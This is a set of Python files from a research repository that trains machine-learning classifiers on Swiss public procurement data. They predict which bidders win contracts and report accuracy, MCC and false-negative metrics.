digital-sustainability/swiss-procurement-classifier
refs/heads/master
from train import ModelTrainer from collection import Collection import pandas as pd import logging import traceback import os logging.basicConfig() logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) # === THESIS === anbieter_config = { 'Construction': [ 'Alpiq AG', 'Swisscom', 'Kummler + Matter AG', 'Siemens AG' ], 'IT': [ 'G. Baumgartner AG', 'ELCA Informatik AG', 'Thermo Fisher Scientific (Schweiz) AG', 'Arnold AG', ], 'Other': [ 'Riget AG', 'isolutions AG', 'CSI Consulting AG', 'Aebi & Co. AG Maschinenfabrik', ], 'Divers': [ 'DB Schenker AG', 'IT-Logix AG', 'AVS Syteme AG', 'Sajet SA' ] } # === TESTING === #anbieter = 'Marti AG' #456 #anbieter = 'Axpo AG' #40 #anbieter = 'Hewlett-Packard' #90 #anbieter = 'BG Ingénieurs Conseils' SA #116 #anbieter = 'Pricewaterhousecoopers' #42 #anbieter = 'Helbling Beratung + Bauplanung AG' #20 #anbieter = 'Ofrex SA' #52 #anbieter = 'PENTAG Informatik AG' #10 #anbieter = 'Wicki Forst AG' #12 #anbieter = 'T-Systems Schweiz' #18 #anbieter = 'Bafilco AG' #20 #anbieter = '4Video-Production GmbH' #3 #anbieter = 'Widmer Ingenieure AG' #6 #anbieter = 'hmb partners AG' #2 #anbieter = 'Planmeca' #4 #anbieter = 'K & M Installationen AG' #4 select_anbieter = ( "anbieter.anbieter_id, " "anbieter.institution as anbieter_institution, " "cpv_dokument.cpv_nummer as anbieter_cpv, " "ausschreibung.meldungsnummer" ) # anbieter_CPV are all the CPVs the Anbieter ever won a procurement for. So all the CPVs they are interested in. select_ausschreibung = ( "anbieter.anbieter_id, " "auftraggeber.institution as beschaffungsstelle_institution, " "auftraggeber.beschaffungsstelle_plz, " "ausschreibung.gatt_wto, " "ausschreibung.sprache, " "ausschreibung.auftragsart_art, " "ausschreibung.lose, " "ausschreibung.teilangebote, " "ausschreibung.varianten, " "ausschreibung.projekt_id, " # "ausschreibung.titel, " "ausschreibung.bietergemeinschaft, " "cpv_dokument.cpv_nummer as ausschreibung_cpv, " "ausschreibung.meldungsnummer as meldungsnummer2" ) attributes = ['ausschreibung_cpv', 'auftragsart_art','beschaffungsstelle_plz','gatt_wto','lose','teilangebote', 'varianten','sprache'] # attributes = ['auftragsart_art'] config = { # ratio that the positive and negative responses have to each other 'positive_to_negative_ratio': 0.5, # Percentage of training set that is used for testing (Recommendation of at least 25%) 'test_size': 0.25, 'runs': 100, #'enabled_algorithms': ['random_forest'], 'enabled_algorithms': ['random_forest', 'decision_tree', 'gradient_boost'], 'random_forest': { # Tune Random Forest Parameter 'n_estimators': 100, 'max_features': 'sqrt', 'max_depth': None, 'min_samples_split': 2 }, 'decision_tree': { 'max_depth': 15, 'max_features': 'sqrt' }, 'gradient_boost': { 'n_estimators': 100, 'learning_rate': 0.1, 'max_depth': 15, 'max_features': 'sqrt' } } # Prepare Attributes def cleanData(df, filters): # if 'beschaffungsstelle_plz' in filters: # df[['beschaffungsstelle_plz']] = df[['beschaffungsstelle_plz']].applymap(ModelTrainer.tonumeric) if 'gatt_wto' in filters: df[['gatt_wto']] = df[['gatt_wto']].applymap(ModelTrainer.unifyYesNo) if 'anzahl_angebote' in filters: df[['anzahl_angebote']] = df[['anzahl_angebote']].applymap(ModelTrainer.tonumeric) if 'teilangebote' in filters: df[['teilangebote']] = df[['teilangebote']].applymap(ModelTrainer.unifyYesNo) if 'lose' in filters: df[['lose']] = df[['lose']].applymap(ModelTrainer.unifyYesNo) if 'varianten' in filters: df[['varianten']] = df[['varianten']].applymap(ModelTrainer.unifyYesNo) if 'auftragsart_art' in filters: auftrags_art_df = pd.get_dummies(df['auftragsart_art'], prefix='aftrgsrt',dummy_na=True) df = pd.concat([df,auftrags_art_df],axis=1).drop(['auftragsart_art'],axis=1) if 'sprache' in filters: sprache_df = pd.get_dummies(df['sprache'], prefix='lang',dummy_na=True) df = pd.concat([df,sprache_df],axis=1).drop(['sprache'],axis=1) if 'auftragsart' in filters: auftragsart_df = pd.get_dummies(df['auftragsart'], prefix='auftr',dummy_na=True) df = pd.concat([df,auftragsart_df],axis=1).drop(['auftragsart'],axis=1) if 'beschaffungsstelle_plz' in filters: plz_df = pd.get_dummies(df['beschaffungsstelle_plz'], prefix='beschaffung_plz',dummy_na=True) df = pd.concat([df,plz_df],axis=1).drop(['beschaffungsstelle_plz'],axis=1) return df class IterationRunner(): def __init__(self, anbieter_config, select_anbieter, select_ausschreibung, attributes, config, cleanData): self.anbieter_config = anbieter_config self.select_anbieter = select_anbieter self.select_ausschreibung = select_ausschreibung self.attributes = attributes self.config = config self.cleanData = cleanData self.trainer = ModelTrainer(select_anbieter, select_ausschreibung, '', config, cleanData, attributes) self.collection = Collection() def run(self): for label, anbieters in self.anbieter_config.items(): logger.info(label) for anbieter in anbieters: for attr_id in range(len(self.attributes)-1): att_list = self.attributes[:attr_id+1] self.singleRun(anbieter, att_list, label) self.trainer.resetSQLData() def runAttributesEachOne(self): for label, anbieters in self.anbieter_config.items(): logger.info(label) for anbieter in anbieters: for attr in self.attributes: att_list = [attr] self.singleRun(anbieter, att_list, label) self.trainer.resetSQLData() def runSimpleAttributeList(self): for label, anbieters in self.anbieter_config.items(): logger.info(label) for anbieter in anbieters: self.singleRun(anbieter, self.attributes, label) self.trainer.resetSQLData() def singleRun(self, anbieter, att_list, label): logger.info('label: {}, anbieter: {}, attributes: {}'.format(label, anbieter, att_list)) try: self.trainer.attributes = att_list self.trainer.anbieter = anbieter output = self.trainer.run() output['label'] = label self.collection.append(output) filename = os.getenv('DB_FILE', 'dbs/auto.json') self.collection.to_file(filename) except Exception as e: traceback.print_exc() print(e) print('one it done') runner = IterationRunner(anbieter_config, select_anbieter, select_ausschreibung, attributes, config, cleanData) if __name__ == '__main__': # runner.collection.import_file('dbs/auto.json') runner.run() runner.runAttributesEachOne() # label, anbieters = next(iter(runner.anbieter_config.items())) # print(label)
Python
206
34.378639
134
/runOldIterations.py
0.628293
0.619512
digital-sustainability/swiss-procurement-classifier
refs/heads/master
import pandas as pd import math from datetime import datetime from sklearn.utils import shuffle from sklearn.model_selection import train_test_split, cross_val_score from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier from sklearn.tree import DecisionTreeClassifier from sklearn.metrics import accuracy_score, confusion_matrix, matthews_corrcoef from db import connection, engine import logging logging.basicConfig() logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) class ModelTrainer(): def __init__(self, select_anbieter, select_ausschreibung, anbieter, config, cleanData, attributes=[]): self.anbieter = anbieter self.select_anbieter = select_anbieter self.select_ausschreibung = select_ausschreibung self.attributes = attributes self.config = config self.cleanData = cleanData def run(self): positive_sample, negative_samples = self.createSamples() positive_and_negative_samples = self.prepareForRun( positive_sample, negative_samples ) # most certainly used to resolve the naming functions like getFalseProjectTitle merged_samples_for_names = self.prepareUnfilteredRun( positive_sample, negative_samples ) result = self.trainSpecifiedModels(positive_and_negative_samples) return result # xTests, yTests = self.trainModel(positive_and_negative_samples) def resetSQLData(self): try: del self.positives del self.negatives except: pass def createSamples(self): if not hasattr(self, 'positives') or not hasattr(self, 'negatives'): self.queryData() negative_samples = [] negative_sample_size = math.ceil(len(self.positives) * (self.config['positive_to_negative_ratio'] + 1)) for count in range(self.config['runs']): negative_samples.append(self.negatives.sample(negative_sample_size, random_state=count)) self.positives['Y'] = 1 for negative_sample in negative_samples: negative_sample['Y']=0 return (self.positives, negative_samples) def queryData(self): self.positives = self.__runSql(True) self.negatives = self.__runSql(False) logger.info('sql done') return self.positives, self.negatives def __runSql(self, response): resp = '=' if (not response): resp = '!=' query = """SELECT * FROM (SELECT {} from ((((((beruecksichtigteanbieter_zuschlag INNER JOIN zuschlag ON zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer) INNER JOIN anbieter ON beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id) INNER JOIN projekt ON zuschlag.projekt_id = projekt.projekt_id) INNER JOIN auftraggeber ON projekt.auftraggeber_id = auftraggeber.auftraggeber_id) INNER JOIN ausschreibung ON projekt.projekt_id = ausschreibung.projekt_id) INNER JOIN cpv_dokument ON cpv_dokument.meldungsnummer = zuschlag.meldungsnummer) WHERE anbieter.institution {} "{}" ) anbieter JOIN (SELECT {} from ((((((beruecksichtigteanbieter_zuschlag INNER JOIN zuschlag ON zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer) INNER JOIN anbieter ON beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id) INNER JOIN projekt ON zuschlag.projekt_id = projekt.projekt_id) INNER JOIN auftraggeber ON projekt.auftraggeber_id = auftraggeber.auftraggeber_id) INNER JOIN ausschreibung ON projekt.projekt_id = ausschreibung.projekt_id) INNER JOIN cpv_dokument ON cpv_dokument.meldungsnummer = ausschreibung.meldungsnummer) WHERE anbieter.institution {} "{}" ) ausschreibung ON ausschreibung.meldungsnummer2 = anbieter.meldungsnummer ORDER BY ausschreibung.meldungsnummer2; """.format(self.select_anbieter, resp, self.anbieter, self.select_ausschreibung, resp, self.anbieter) return pd.read_sql(query, engine) def prepareForRun(self, positive_sample, negative_samples): # What attributes the model will be trained by filters = ['Y', 'projekt_id'] + self.attributes positive_and_negative_samples = [] for negative_sample in negative_samples: # Merge positive and negative df into one, only use selected attributes merged_samples = positive_sample.append(negative_sample, ignore_index=True)[filters].copy() # Clean the data of all selected attributes cleaned_merged_samples = self.cleanData(merged_samples, self.attributes) positive_and_negative_samples.append(cleaned_merged_samples) return positive_and_negative_samples def prepareUnfilteredRun(self, positive_sample, negative_samples): merged_samples_for_names = [] for negative_sample in negative_samples: # Merge positive and negative df into one merged_samples_for_names.append(positive_sample.append(negative_sample, ignore_index=True).copy()) return merged_samples_for_names def trainSpecifiedModels(self, positive_and_negative_samples): result = {} for algorithm in self.config['enabled_algorithms']: if algorithm == 'random_forest': n_estimators = self.config[algorithm]['n_estimators'] max_depth = self.config[algorithm]['max_depth'] max_features = self.config[algorithm]['max_features'] min_samples_split = self.config[algorithm]['min_samples_split'] classifier = lambda randomState: RandomForestClassifier( n_estimators=n_estimators, max_depth=max_depth, max_features=max_features, min_samples_split=min_samples_split, random_state=randomState, n_jobs=-1 ) elif algorithm == 'gradient_boost': n_estimators = self.config[algorithm]['n_estimators'] max_depth = self.config[algorithm]['max_depth'] max_features = self.config[algorithm]['max_features'] learning_rate = self.config[algorithm]['learning_rate'] classifier = lambda randomState: GradientBoostingClassifier( n_estimators=n_estimators, max_depth=max_depth, max_features=max_features, learning_rate=learning_rate, random_state=randomState ) elif algorithm == 'decision_tree': max_depth = self.config[algorithm]['max_depth'] max_features = self.config[algorithm]['max_features'] classifier = lambda randomState: DecisionTreeClassifier( max_depth=max_depth, max_features=max_features ) else: raise Exception('enabled algorithm: {} doesn\'t exist.'.format(algorithm)) result[algorithm] = {} xTests, yTests = self.trainModel(positive_and_negative_samples, classifier, algorithm) result['attributes'] = self.attributes result['anbieter'] = self.anbieter result['timestamp'] = datetime.now().isoformat() #result[algorithm]['xTests'] = xTests #result[algorithm]['yTests'] = yTests result[algorithm]['metrics'] = self.config[algorithm] evaluation_dataframe =pd.concat([self.__getConfusionMatices(yTests), self.__getAccuracies(yTests)], axis=1, sort=False) result[algorithm]['data'] = evaluation_dataframe.to_dict() result[algorithm]['metadata'] = self.__getIterationMetadata(evaluation_dataframe) return result def trainModel(self, positive_and_negative_samples, classifier, algorithm): xTests = [] yTests = [] for idx, df in enumerate(positive_and_negative_samples): # enum to get index x_and_y_test, x_and_y_train = self.unique_train_and_test_split(df, random_state=idx) # Select all attributes xtest = x_and_y_test.drop(['Y'], axis=1) xtrain = x_and_y_train.drop(['Y'], axis=1) # Only select the response result attributes ytest = x_and_y_test['Y'] ytrain = x_and_y_train['Y'] # Create the model clf = classifier(randomState=idx) # Compute cross validation (5-fold) scores = self.__cross_val_score(clf, xtest, ytest, cv=5) print(scores) print('Avg. CV Score | {} Run {}: {:.2f}'.format(algorithm, idx, round(sum(scores)/len(scores), 4))) xtest = xtest.drop(['projekt_id'], axis=1) xtrain = xtrain.drop(['projekt_id'], axis=1) # Train the model on training sets clf = clf.fit(xtrain, ytrain) # Predict on the test sets prediction = clf.predict(xtest) # Convert pandas.series to data frame df_ytest = ytest.to_frame() # Add run number to df df_ytest['run'] = idx xtest['run'] = idx # add prediction to df df_ytest['prediction']= prediction # add result of run to df df_ytest['correct'] = df_ytest['prediction']==df_ytest['Y'] # add run to run arrays xTests.append(xtest) yTests.append(df_ytest) return xTests, yTests def __getAccuracies(self, dfys): res = pd.DataFrame(columns=['accuracy', 'MCC', 'fn_rate']) for dfy in dfys: acc = round(accuracy_score(dfy.Y, dfy.prediction), 4) # f1 = round(f1_score(dfy.Y, dfy.prediction), 4) mcc = matthews_corrcoef(dfy.Y, dfy.prediction) matrix = confusion_matrix(dfy.Y, dfy.prediction) fnr = round(matrix[1][0] / (matrix[1][1] + matrix[1][0]), 4) # add row to end of df, *100 for better % readability res.loc[len(res)] = [ acc*100, mcc, fnr*100 ] return res def __getConfusionMatices(self, dfys): res = pd.DataFrame(columns=['tn', 'tp', 'fp', 'fn']) for dfy in dfys: # ConfusionMatrix legende: # [tn, fp] # [fn, tp] matrix = confusion_matrix(dfy.Y, dfy.prediction) res.loc[len(res)] = [ matrix[0][0], matrix[1][1], matrix[0][1], matrix[1][0] ] # res.loc['sum'] = res.sum() # Summarize each column return res def __getIterationMetadata(self, df): res = {} res['acc_mean'] = df['accuracy'].mean() res['acc_median'] = df['accuracy'].median() res['acc_min'] = df['accuracy'].min() res['acc_max'] = df['accuracy'].max() res['acc_quantile_25'] = df['accuracy'].quantile(q=.25) res['acc_quantile_75'] = df['accuracy'].quantile(q=.75) res['mcc_mean'] = df['MCC'].mean() res['mcc_median'] = df['MCC'].median() res['mcc_min'] = df['MCC'].min() res['mcc_max'] = df['MCC'].max() res['mcc_quantile_25'] = df['MCC'].quantile(q=.25) res['mcc_quantile_75'] = df['MCC'].quantile(q=.75) res['fn_rate_mean'] = df['fn_rate'].mean() res['fn_rate_median'] = df['fn_rate'].median() res['fn_rate_min'] = df['fn_rate'].min() res['fn_rate_max'] = df['fn_rate'].max() res['fn_rate_quantile_25'] = df['fn_rate'].quantile(q=.25) res['fn_rate_quantile_75'] = df['fn_rate'].quantile(q=.75) res['sample_size_mean'] = (df['fp'] + df['fn'] + df['tn'] + df['tp']).mean() return res def __cross_val_score(self, clf, x_values, y_values, cv): x_and_y_values = pd.concat([y_values, x_values], axis=1) cross_val_scores = [] for validation_run_index in range(cv): x_and_y_test, x_and_y_train = self.unique_train_and_test_split(x_and_y_values, random_state=validation_run_index) # Select all attributes but meldungsnummer xtest = x_and_y_test.drop(['projekt_id', 'Y'], axis=1) xtrain = x_and_y_train.drop(['projekt_id', 'Y'], axis=1) # Only select the response result attributes ytest = x_and_y_test['Y'] ytrain = x_and_y_train['Y'] clf = clf.fit(xtrain, ytrain) prediction = clf.predict(xtest) cross_val_scores.append(accuracy_score(ytest, prediction)) return cross_val_scores def unique_train_and_test_split(self, df, random_state): run = shuffle(df, random_state=random_state) # run index as random state # Get each runs unique meldungsnummer unique_mn = run.projekt_id.unique() # Split the meldungsnummer between test and trainings set so there will be no bias in test set x_unique_test, x_unique_train = train_test_split(unique_mn, test_size=self.config['test_size'], random_state=random_state) # Add the remaining attributes to meldungsnummer x_and_y_test = run[run['projekt_id'].isin(x_unique_test)].copy() x_and_y_train = run[run['projekt_id'].isin(x_unique_train)].copy() return x_and_y_test, x_and_y_train # @param val: a value to be casted to numeric # @return a value that has been casted to an integer. Returns 0 if cast was not possible def tonumeric(val): try: return int(val) except: return 0 # @param val: a string value to be categorised # @return uniffied gatt_wto resulting in either "Yes", "No" or "?" def unifyYesNo(val): switcher = { 'Ja': 1, 'Sì': 1, 'Oui': 1, 'Nein': 0, 'Nei': 0, 'Non': 0, } return switcher.get(val, 0)
Python
305
45.27869
131
/train.py
0.599164
0.593569
digital-sustainability/swiss-procurement-classifier
refs/heads/master
import pandas as pd import numpy as np import math import re from datetime import datetime from sklearn.utils import shuffle from sklearn.model_selection import train_test_split, cross_val_score from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier from sklearn.tree import DecisionTreeClassifier from sklearn.metrics import accuracy_score, confusion_matrix, matthews_corrcoef from sklearn import tree from db import connection, engine import logging logging.basicConfig() logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) class ModelTrainer(): def __init__(self, select, anbieter, config, attributes=[]): self.anbieter = anbieter self.select = select self.attributes = attributes self.config = config def run(self): self.queryData() prepared_positives, prepared_negatives, duplicates = self.prepare_data() result = self.trainAllModels(prepared_positives, prepared_negatives) result['duplicates'] = duplicates.to_dict() return result def resetSQLData(self): try: del self.positives del self.negatives except: pass def trainAllModels(self, positives, negatives): result = { 'attributes': self.attributes, 'anbieter': self.anbieter, 'timestamp': datetime.now().isoformat() } samples = self.createSamples(positives, negatives) result = {**result, **self.trainAllAlgorithms(samples)} return result def createSamples(self, positives, negatives): negative_sample_size = math.ceil(len(positives) * (self.config['positive_to_negative_ratio'] + 1)) samples = [] for runIndex in range(self.config['runs']): negative_sample = negatives.sample(negative_sample_size, random_state=runIndex) sample = positives.append(negative_sample, ignore_index=True) sample.reset_index(drop=True, inplace=True) sample.fillna(0, inplace=True) sample = shuffle(sample, random_state=runIndex) samples.append(sample) return samples def trainAllAlgorithms(self, samples): result = {} for algorithm in self.config['enabled_algorithms']: if algorithm == 'random_forest': n_estimators = self.config[algorithm]['n_estimators'] max_depth = self.config[algorithm]['max_depth'] max_features = self.config[algorithm]['max_features'] min_samples_split = self.config[algorithm]['min_samples_split'] classifier = lambda randomState: RandomForestClassifier( n_estimators=n_estimators, max_depth=max_depth, max_features=max_features, min_samples_split=min_samples_split, random_state=randomState, n_jobs=-1 ) elif algorithm == 'gradient_boost': n_estimators = self.config[algorithm]['n_estimators'] max_depth = self.config[algorithm]['max_depth'] max_features = self.config[algorithm]['max_features'] learning_rate = self.config[algorithm]['learning_rate'] classifier = lambda randomState: GradientBoostingClassifier( n_estimators=n_estimators, max_depth=max_depth, max_features=max_features, learning_rate=learning_rate, random_state=randomState ) elif algorithm == 'decision_tree': max_depth = self.config[algorithm]['max_depth'] max_features = self.config[algorithm]['max_features'] classifier = lambda randomState: DecisionTreeClassifier( max_depth=max_depth, max_features=max_features ) else: raise Exception('enabled algorithm: {} doesn\'t exist.'.format(algorithm)) result[algorithm] = {} x_tests, y_tests = self.trainModel(samples, classifier, algorithm) result[algorithm]['metrics'] = self.config[algorithm] evaluation_dataframe = pd.concat([self.__getConfusionMatices(y_tests), self.__getAccuracies(y_tests)], axis=1, sort=False) result[algorithm]['data'] = evaluation_dataframe.to_dict() result[algorithm]['metadata'] = self.__getIterationMetadata(evaluation_dataframe) return result def trainModel(self, samples, get_classifier, algorithm): x_tests = [] y_tests = [] for runIndex, sample in enumerate(samples): classifier = get_classifier(runIndex) train, test = train_test_split(sample, random_state=runIndex) if 'skip_cross_val' not in self.config or not self.config['skip_cross_val']: # Compute cross validation (5-fold) scores = self.__cross_val_score(classifier, train, cv=5) print(scores) print('Avg. CV Score | {} Run {}: {:.2f}'.format(algorithm, runIndex, round(sum(scores)/len(scores), 4))) # Select all attributes x_test = test.drop(['Y'], axis=1) x_train = train.drop(['Y'], axis=1) # Only select the response result attributes y_test = test[['Y']].copy() y_train = train[['Y']] # Create the model # Train the model on training sets classifier = classifier.fit(x_train, y_train['Y']) # print the max_depths of all classifiers in a Random Forest if algorithm == 'random_forest': print('Random Forest Depts:', [self.dt_max_depth(t.tree_) for t in classifier.estimators_]) # Create a file displaying the tree if 'draw_tree' in self.config and self.config['draw_tree'] and algorithm == 'decision_tree' and runIndex == 0: tree.export_graphviz(classifier, out_file='tree.dot', feature_names=x_train.columns) # Predict on the test sets prediction = classifier.predict(x_test) # Add run number to df y_test['run'] = runIndex x_test['run'] = runIndex # add prediction to df y_test['prediction'] = prediction # add result of run to df y_test['correct'] = y_test['prediction'] == y_test['Y'] # add run to run arrays x_tests.append(x_test) y_tests.append(y_test) return x_tests, y_tests def queryData(self): if not hasattr(self, 'positives') or not hasattr(self, 'negatives'): self.positives = self.__runSql(True) self.negatives = self.__runSql(False) logger.info('sql done') return self.positives, self.negatives def __runSql(self, response): resp = '=' if (not response): resp = '!=' query = """SELECT {} from beruecksichtigteanbieter_zuschlag JOIN zuschlag ON zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer JOIN anbieter ON beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id JOIN projekt ON zuschlag.projekt_id = projekt.projekt_id JOIN auftraggeber ON projekt.auftraggeber_id = auftraggeber.auftraggeber_id JOIN ausschreibung ON projekt.projekt_id = ausschreibung.projekt_id JOIN cpv_dokument ON cpv_dokument.meldungsnummer = ausschreibung.meldungsnummer WHERE anbieter.institution {} "{}" ORDER BY ausschreibung.meldungsnummer; """.format(self.select, resp, self.anbieter) return pd.read_sql(query, engine) def prepareUnfilteredRun(self, positive_sample, negative_samples): merged_samples_for_names = [] for negative_sample in negative_samples: # Merge positive and negative df into one merged_samples_for_names.append(positive_sample.append(negative_sample, ignore_index=True).copy()) return merged_samples_for_names def __getAccuracies(self, dfys): res = pd.DataFrame(columns=['accuracy', 'MCC', 'fn_rate']) for dfy in dfys: acc = round(accuracy_score(dfy.Y, dfy.prediction), 4) # f1 = round(f1_score(dfy.Y, dfy.prediction), 4) mcc = matthews_corrcoef(dfy.Y, dfy.prediction) matrix = confusion_matrix(dfy.Y, dfy.prediction) fnr = round(matrix[1][0] / (matrix[1][1] + matrix[1][0]), 4) # add row to end of df, *100 for better % readability res.loc[len(res)] = [ acc*100, mcc, fnr*100 ] return res def __getConfusionMatices(self, dfys): res = pd.DataFrame(columns=['tn', 'tp', 'fp', 'fn']) for dfy in dfys: # ConfusionMatrix legende: # [tn, fp] # [fn, tp] matrix = confusion_matrix(dfy.Y, dfy.prediction) res.loc[len(res)] = [ matrix[0][0], matrix[1][1], matrix[0][1], matrix[1][0] ] # res.loc['sum'] = res.sum() # Summarize each column return res def __getIterationMetadata(self, df): res = {} res['acc_mean'] = df['accuracy'].mean() res['acc_median'] = df['accuracy'].median() res['acc_min'] = df['accuracy'].min() res['acc_max'] = df['accuracy'].max() res['acc_quantile_25'] = df['accuracy'].quantile(q=.25) res['acc_quantile_75'] = df['accuracy'].quantile(q=.75) res['mcc_mean'] = df['MCC'].mean() res['mcc_median'] = df['MCC'].median() res['mcc_min'] = df['MCC'].min() res['mcc_max'] = df['MCC'].max() res['mcc_quantile_25'] = df['MCC'].quantile(q=.25) res['mcc_quantile_75'] = df['MCC'].quantile(q=.75) res['fn_rate_mean'] = df['fn_rate'].mean() res['fn_rate_median'] = df['fn_rate'].median() res['fn_rate_min'] = df['fn_rate'].min() res['fn_rate_max'] = df['fn_rate'].max() res['fn_rate_quantile_25'] = df['fn_rate'].quantile(q=.25) res['fn_rate_quantile_75'] = df['fn_rate'].quantile(q=.75) res['sample_size_mean'] = (df['fp'] + df['fn'] + df['tn'] + df['tp']).mean() return res def __cross_val_score(self, clf, sample, cv): cross_val_scores = [] for validation_run_index in range(cv): train, test = train_test_split(sample, random_state=validation_run_index) # Select all attributes but meldungsnummer xtest = test.drop(['Y'], axis=1) xtrain = train.drop(['Y'], axis=1) # Only select the response result attributes ytest = test[['Y']] ytrain = train[['Y']] clf = clf.fit(xtrain, ytrain['Y']) prediction = clf.predict(xtest) cross_val_scores.append(accuracy_score(ytest, prediction)) return cross_val_scores def prepare_data(self): filter_attributes = ['meldungsnummer'] + self.attributes # filter only specified attributes positives = self.positives[filter_attributes].copy() negatives = self.negatives[filter_attributes].copy() positives['Y'] = 1 negatives['Y'] = 0 merged = positives.append(negatives, ignore_index=True) if hasattr(self, 'cleanData'): positives = self.cleanData(positives, self.attributes) negatives = self.cleanData(negatives, self.attributes) else: # positives = self.preprocess_data(positives, self.attributes) # negatives = self.preprocess_data(negatives, self.attributes) merged, duplicates = self.preprocess_data(merged, self.attributes) positives = merged[merged['Y']==1] negatives = merged[merged['Y']==0] return positives, negatives, duplicates def preprocess_data(self, df, filters): df = df.copy() # drop duplicates before starting to preprocess df = df.drop_duplicates() if 'ausschreibung_cpv' in filters: split = { 'division': lambda x: math.floor(x/1000000), 'group': lambda x: math.floor(x/100000), 'class': lambda x: math.floor(x/10000), 'category': lambda x: math.floor(x/1000) } for key, applyFun in split.items(): df['cpv_' + key ] = df['ausschreibung_cpv'].apply(applyFun) tmpdf = {} for key in split.keys(): key = 'cpv_' + key tmpdf[key] = df[['meldungsnummer']].join(pd.get_dummies(df[key], prefix=key)).groupby('meldungsnummer').max() encoded_df = pd.concat([tmpdf['cpv_'+ key] for key in split.keys()], axis=1) df = df.drop(['cpv_' + key for key, fun in split.items()], axis=1) df = df.drop(['ausschreibung_cpv'], axis=1) df = df.drop_duplicates() df = df.join(encoded_df, on='meldungsnummer') if 'gatt_wto' in filters: df[['gatt_wto']] = df[['gatt_wto']].applymap(ModelTrainer.unifyYesNo) if 'anzahl_angebote' in filters: df[['anzahl_angebote']] = df[['anzahl_angebote']].applymap(ModelTrainer.tonumeric) if 'teilangebote' in filters: df[['teilangebote']] = df[['teilangebote']].applymap(ModelTrainer.unifyYesNo) if 'lose' in filters: df[['lose']] = df[['lose']].applymap(ModelTrainer.unifyYesNoOrInt) if 'varianten' in filters: df[['varianten']] = df[['varianten']].applymap(ModelTrainer.unifyYesNo) if 'auftragsart_art' in filters: auftrags_art_df = pd.get_dummies(df['auftragsart_art'], prefix='aftrgsrt', dummy_na=True) df = pd.concat([df,auftrags_art_df],axis=1).drop(['auftragsart_art'], axis=1) if 'sprache' in filters: sprache_df = pd.get_dummies(df['sprache'], prefix='lang', dummy_na=True) df = pd.concat([df,sprache_df],axis=1).drop(['sprache'], axis=1) if 'auftragsart' in filters: auftragsart_df = pd.get_dummies(df['auftragsart'], prefix='auftr', dummy_na=True) df = pd.concat([df,auftragsart_df],axis=1).drop(['auftragsart'], axis=1) if 'beschaffungsstelle_plz' in filters: # plz_df = pd.get_dummies(df['beschaffungsstelle_plz'], prefix='beschaffung_plz', dummy_na=True) # df = pd.concat([df,plz_df],axis=1).drop(['beschaffungsstelle_plz'], axis=1) df['beschaffungsstelle_plz'] = df['beschaffungsstelle_plz'].apply(ModelTrainer.transformToSingleInt) split = { 'district': lambda x: math.floor(x/1000) if not math.isnan(x) else x, 'area': lambda x: math.floor(x/100) if not math.isnan(x) else x, } prefix = 'b_plz_' for key, applyFun in split.items(): df[prefix + key] = df['beschaffungsstelle_plz'].apply(applyFun) df.rename(columns={'beschaffungsstelle_plz': prefix + 'ganz'}, inplace=True) for key in ['ganz'] + list(split.keys()): key = prefix + key df = pd.concat([df, pd.get_dummies(df[key], prefix=key, dummy_na=True)], axis=1).drop(key, axis=1) df.drop_duplicates(inplace=True) if any(df.duplicated(['meldungsnummer'])): logger.warning("duplicated meldungsnummer") duplicates = df[df.duplicated(['meldungsnummer'])] df = df.drop(['meldungsnummer'], axis=1) return df, duplicates def dt_max_depth(self, tree): n_nodes = tree.node_count children_left = tree.children_left children_right = tree.children_right def walk(node_id): if (children_left[node_id] != children_right[node_id]): left_max = 1 + walk(children_left[node_id]) right_max = 1 + walk(children_right[node_id]) return max(left_max, right_max) else: # is leaf return 1 root_node_id = 0 return walk(root_node_id) # @param val: a value to be casted to numeric # @return a value that has been casted to an integer. Returns 0 if cast was not possible def tonumeric(val): try: return int(val) except: return 0 # @param val: a string value to be categorised # @return uniffied gatt_wto resulting in either "Yes", "No" or "?" @staticmethod def unifyYesNo(val): switcher = { 'Ja': 1, 'Sì': 1, 'Oui': 1, 'YES': 1, 'Nein': 0, 'Nei': 0, 'Non': 0, 'NO': 0, } return switcher.get(val, 0) @staticmethod def unifyYesNoOrInt(val): try: return int(val) except ValueError: return ModelTrainer.unifyYesNo(val) @staticmethod def transformToSingleInt(plz): try: result = int(plz) except ValueError: try: result = int(re.search(r"\d{4}", plz).group()) except AttributeError: return np.nan return result if result >= 1000 and result <= 9999 else np.nan
Python
426
39.953053
134
/learn.py
0.57549
0.567695
digital-sustainability/swiss-procurement-classifier
refs/heads/master
from db import connection, engine import math import pandas as pd import numpy as np from sklearn import tree from sklearn.model_selection import train_test_split from sklearn.metrics import confusion_matrix, accuracy_score, roc_curve, auc # ===================== # SQL SELECT STATEMENTS # ===================== # @param select: SELECT argument formatted as string # @return a Pandas dataframe from the full Simap datanbase depending on the SQL SELECT Query def getFromSimap(select): query = """SELECT {} from (((((beruecksichtigteanbieter_zuschlag INNER JOIN zuschlag ON zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer) INNER JOIN anbieter ON beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id) INNER JOIN projekt ON zuschlag.projekt_id = projekt.projekt_id) INNER JOIN auftraggeber ON projekt.auftraggeber_id = auftraggeber.auftraggeber_id) INNER JOIN ausschreibung ON projekt.projekt_id = ausschreibung.projekt_id INNER JOIN cpv_dokument ON cpv_dokument.meldungsnummer = zuschlag.meldungsnummer) INNER JOIN cpv ON cpv_dokument.cpv_nummer = cpv.cpv_nummer; """.format(select) return pd.read_sql(query, connection); # @param bidder: anbieter.institution name formatted as string # @return a Pandas dataframe showing the most important CPV codes per bidder. (Zuschläge pro CPV Code) def getCpvCount(bidder): query = """SELECT cpv.cpv_nummer, cpv.cpv_deutsch, COUNT(cpv_dokument.cpv_nummer) FROM cpv, cpv_dokument, zuschlag, beruecksichtigteanbieter_zuschlag, anbieter WHERE cpv.cpv_nummer = 